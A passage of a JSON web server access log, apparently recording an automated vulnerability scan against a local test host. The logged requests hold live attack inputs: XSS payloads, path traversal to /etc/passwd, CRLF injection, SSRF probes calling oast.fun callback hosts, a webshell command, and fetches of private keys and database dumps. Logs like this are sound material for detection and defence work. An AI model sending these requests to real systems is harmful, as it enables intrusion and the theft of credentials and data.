AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbdump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?u=http://c9v8h8gsmpv8c1qg07h0cxs4hg33mmoux.oast.fun/&href=http://c9v8h8gsmpv8c1qg07h0s3s5tynpnw4ys.oast.fun/&action=http://c9v8h8gsmpv8c1qg07h0g8e3rnjktm7d7.oast.fun/&host=c9v8h8gsmpv8c1qg07h0wnkk3zbpt74nc.oast.fun&http_host=c9v8h8gsmpv8c1qg07h0m63m671zh9oow.oast.fun&email=root@c9v8h8gsmpv8c1qg07h07km33ss419tbx.oast.fun&url=http://c9v8h8gsmpv8c1qg07h03466q1phbbfwa.oast.fun/&load=http://c9v8h8gsmpv8c1qg07h0tnctqrfqp54re.oast.fun/&preview=http://c9v8h8gsmpv8c1qg07h0teanqry39emhm.oast.fun/&target=http://c9v8h8gsmpv8c1qg07h0a4z3oba1sm8df.oast.fun/&proxy=http://c9v8h8gsmpv8c1qg07h0gqzx8moe1q19z.oast.fun/&from=http://c9v8h8gsmpv8c1qg07h0q8m3n7kdr4c9e.oast.fun/&src=http://c9v8h8gsmpv8c1qg07h0bk48cttejyksa.oast.fun/&ref=http://c9v8h8gsmpv8c1qg07h0o9rz71y3g7oy9.oast.fun/&referrer=http://c9v8h8gsmpv8c1qg07h0yug9xs7f4azr6.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/91 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/test123456.jsp?pwd=asasd3344&297MTtbOg89j5n4dbTg3JmDOg85=ipconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.220","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LTX_navi.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query={__typename} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/92 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.225","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/93 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl?detail=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1_db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /darkstat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/oembed/1.0/proxy?url=http://c9v8h88smpv8c1ig07h0s5f9e34zro39o.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radiusmanager/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 